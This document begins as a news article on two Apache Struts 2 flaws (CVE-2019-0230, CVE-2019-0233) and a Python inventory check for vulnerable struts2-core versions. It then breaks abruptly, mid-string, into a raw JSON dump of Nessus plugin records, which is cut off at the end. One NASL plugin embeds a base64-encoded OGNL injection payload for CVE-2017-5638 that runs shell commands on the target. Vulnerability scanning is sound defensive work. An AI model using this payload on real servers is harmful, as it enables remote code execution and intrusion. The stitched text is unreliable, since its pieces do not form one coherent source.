Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.
The Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.
Struts 2 is an open-source framework and library for building Java-based enterprise applications, popular with developers and companies alike. Both vulnerabilities in question were fixed last November.
Researchers have warned that outdated Apache Struts 2 installations, [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), can open the door to critical holes like the one at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).
## **PoC Released to GitHub**
The proof-of-concept (PoC) [released this week](<https://github.com/cellanu/cve-2019-0230>) raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expression, which can open the door to a remote code-execution attack, according to the security bulletin. OGNL is an expression language for Java that can let attackers access data objects and then use them to create and inject server-side code.
“Successful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,” according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.
While the PoC exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch the DoS bug (CVE-2019-0233). That vulnerability affects the write permissions of file directories and can lead to conditions ripe for a DoS attack.
According to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Struts Action that exposes the file.
“An attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container’s temp directory to read only, such that subsequent upload actions will fail,” [according to the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).
The Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests that security teams verify no unauthorized system modifications have occurred before applying the patch, and that they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.
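Before upgrading, a defender first has to know which builds actually ship a vulnerable Struts. The inventory check below is an added example, not code from the article or from the Apache Struts project: it reads `struts2-core` declarations out of a Maven `pom.xml`, resolves `${property}` version placeholders, and flags anything inside the affected range the article gives (2.0.0 through 2.5.20) against the fixed release 2.5.22. The `pom.xml` fragment is constructed sample input; the coordinates `org.apache.struts:struts2-core` are the artifact's published Maven coordinates.

```python
"""Flag Apache Struts 2 dependencies in the range affected by CVE-2019-0230/0233.

Added example (not from the Threatpost article or the Struts project).
The affected range and the fixed release come from the article; the
pom.xml below is constructed sample input.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

AFFECTED_MIN = (2, 0, 0)    # first affected release named in the advisory
AFFECTED_MAX = (2, 5, 20)   # last affected release named in the advisory
FIXED_VERSION = "2.5.22"    # upgrade target recommended by the Struts team

# Maven coordinates of the Struts 2 core artifact.
STRUTS_ARTIFACTS = {("org.apache.struts", "struts2-core")}

# Constructed sample: version pinned through a Maven property, as many real poms do.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <properties>
    <struts.version>2.5.16</struts.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-core</artifactId>
      <version>${struts.version}</version>
    </dependency>
    <dependency>
      <groupId>com.example</groupId>
      <artifactId>unrelated-lib</artifactId>
      <version>1.0</version>
    </dependency>
  </dependencies>
</project>"""


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn '2.5.20' into (2, 5, 20); tolerates suffixes such as '2.3.34-SNAPSHOT'.

    Numeric tuples compare correctly where plain string comparison would not
    (string order puts '2.5.9' after '2.5.20')."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_affected(version: str) -> bool:
    """True when the version lies in the advisory's affected range, inclusive."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def _local(tag: str) -> str:
    """Strip the XML namespace so '{...POM/4.0.0}version' becomes 'version'."""
    return tag.rsplit("}", 1)[-1]


def _properties(root: ET.Element) -> Dict[str, str]:
    """Collect <properties> children so ${name} placeholders can be resolved."""
    props: Dict[str, str] = {}
    for el in root.iter():
        if _local(el.tag) == "properties":
            for child in el:
                props[_local(child.tag)] = (child.text or "").strip()
    return props


def _resolve(value: str, props: Dict[str, str]) -> str:
    """Replace a whole-value ${property} reference; leave anything else untouched."""
    m = re.fullmatch(r"\$\{([^}]+)\}", value)
    return props.get(m.group(1), value) if m else value


def find_struts_versions(pom_xml: str) -> List[str]:
    """Return the (resolved) version strings of every struts2-core dependency."""
    root = ET.fromstring(pom_xml)
    props = _properties(root)
    found: List[str] = []
    for dep in root.iter():
        if _local(dep.tag) != "dependency":
            continue
        fields = {_local(c.tag): (c.text or "").strip() for c in dep}
        key = (fields.get("groupId"), fields.get("artifactId"))
        if key in STRUTS_ARTIFACTS and fields.get("version"):
            found.append(_resolve(fields["version"], props))
    return found


def assess_pom(pom_xml: str) -> List[Tuple[str, Optional[bool]]]:
    """Pair each struts2-core version with True/False, or None if unparseable
    (for example an unresolved placeholder that still needs a manual look)."""
    results: List[Tuple[str, Optional[bool]]] = []
    for version in find_struts_versions(pom_xml):
        try:
            results.append((version, is_affected(version)))
        except ValueError:
            results.append((version, None))
    return results


if __name__ == "__main__":
    for version, affected in assess_pom(SAMPLE_POM):
        verdict = {True: f"AFFECTED, upgrade to {FIXED_VERSION}",
                   False: "not in affected range",
                   None: "could not parse, review manually"}[affected]
        print(f"struts2-core {version}: {verdict}")
```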
(CVE-2019-0230)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://my.f5.com/manage/s/article/K35226442\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K35226442.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0230\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/11/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K35226442';\nvar vmatrix = {\n 'AM': {\n 'affected': [\n '15.1.0','14.1.0-14.1.2','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running the affected module AM');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:55", "description": "The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore, affected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). 
The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property without further validation, the provided OGNL expression contained in the skillName attribute gets evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only referencing validated values in the given expression. However, when referencing unvalidated user input in the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well as other classes from these standard library packages are not properly protected by the framework to deny access to potentially harmful underlying properties. 
(CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-08-14T00:00:00", "type": "nessus", "title": "Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_22.NASL", "href": "https://www.tenable.com/plugins/nessus/139607", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139607);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-0230\", \"CVE-2019-0233\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0113\");\n\n script_name(english:\"Apache Struts 2.x <= 2.5.20 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is 2.x prior or equal to 2.5.20. It is, therefore,\naffected by multiple vulnerabilities:\n\n - The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to\n certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when\n a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code\n Execution (RCE). 
The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when\n the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify\n by crafting a corresponding request.Example:List available EmployeesIf an attacker is able to modify the\n skillName attribute in a request such that a raw OGNL expression gets passed to the skillName property\n without further validation, the provided OGNL expression contained in the skillName attribute gets\n evaluated when the tag is rendered as a result of the request.The opportunity for using double evaluation\n is by design in Struts since 2.0.0 and a useful tool when done right, which most notably means only\n referencing validated values in the given expression. However, when referencing unvalidated user input in\n the expression, malicious code can get injected. In an ongoing effort, the Struts framework includes\n mitigations for limiting the impact of injected expressions, but Struts before 2.5.22 left an attack\n vector open which is addressed by this report. This issue is similar to: S2-029 and S2-036. (CVE-2019-0230)\n\n - When a file upload is performed to an Action that exposes the file with a getter, an attacker may\n manipulate the request such that the working copy of the uploaded file is set to read-only. As a result,\n subsequent actions on the file will fail with an error. It might also be possible to set the Servlet\n container's temp directory to read only, such that subsequent upload actions will fail. In Struts prior\n to 2.5.22, stack-accessible values (e.g. Action properties) of type java.io.File and java.nio.File as well\n as other classes from these standard library packages are not properly protected by the framework to deny\n access to potentially harmful underlying properties. 
(CVE-2019-0233)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-059\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-060\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.22 or later or apply the workarounds as referenced in in the vendor security\nbulletins.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0230\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nwin_local = FALSE;\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os)) win_local = TRUE;\n\napp_info = vcf::get_app_info(app:'Apache Struts', win_local:win_local);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.5.20', 'fixed_version' : '2.5.22' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:52:40", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. 
An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/97610", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97610);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the Jakarta Multipart parser\ndue to improper handling of the Content-Type header. 
An\nunauthenticated, remote attacker can exploit this, via a specially\ncrafted Content-Type header value in the HTTP request, to potentially\nexecute arbitrary code, subject to the privileges of the web server\nuser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", 
value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list('/');\n\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + 
'/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nurls = list_uniq(urls);\n\nvuln = FALSE;\n\nrand_var = rand_str(length:8);\nheader_payload = \"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','\" + rand_var + \"')}.multipart/form-data\";\nheaders_1 = make_array(\"Content-Type\", header_payload);\n\n# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV\n# vendors.\n# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))\nexploit = \"JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX\";\nexploit += \"h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ\";\nexploit += \"lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w\";\nexploit += \"aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb\";\nexploit += \"D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi\";\nexploit += \"5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t\";\nexploit += \"hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz\";\nexploit += \"KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja\";\nexploit += \"XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG\";\nexploit += \"9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N\";\nexploit += \"tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn\";\nexploit += \"fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL\";\nexploit += \"nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS\";\nexploit += \"4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB\";\nexploit += 
\"nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv\";\nexploit += \"bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI\";\nexploit += \"3JvcykpLigjcm9zLmZsdXNoKCkpfQo=\";\n\nheaders_2 = make_array(\"Content-Type\", chomp(base64_decode(str:exploit)));\n\n# Since struts apps could be taking longer\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nforeach url (urls)\n{\n ############################################\n # Method 1\n ############################################\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_1,\n exit_on_fail : TRUE\n );\n if ( (\"X-Tenable: \"+ rand_var ) >< res[1] )\n vuln = TRUE;\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n\n ############################################\n # Method 2\n ############################################\n\n cmd_pats = make_array();\n cmd_pats['id'] = \"uid=[0-9]+.*\\sgid=[0-9]+.*\";\n cmd_pats['ipconfig'] = \"Subnet Mask|Windows IP|IP(v(4|6)?)? 
Address\";\n\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_2,\n exit_on_fail : TRUE\n );\n\n if (\"Windows IP\" >< res[2] || \"uid\" >< res[2])\n {\n if (pgrep(pattern:cmd_pats['id'], string:res[2]))\n {\n output = strstr(res[2], \"uid\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))\n {\n output = strstr(res[2], \"Windows IP\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n }\n}\n\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : chomp(output)\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:51", "description": "The remote web server is being targeted by an Apache Struts 2 exploitation attempt. Versions of Apache Struts 2.5.x prior to 2.5.10.1 and 2.3.x prior to 2.3.32 are affected by a flaw that is triggered when handling invalid Content-Type, Content-Disposition, or Content-Length values for uploaded files using the Jakarta Multipart parser. 
This may allow a remote attacker to potentially execute arbitrary code.", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2 RCE (CVE-2017-5638) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "700055.PRM", "href": "https://www.tenable.com/plugins/nnm/700055", "sourceData": "Binary data 700055.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:53:10", "description": "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/97576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97576);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", 
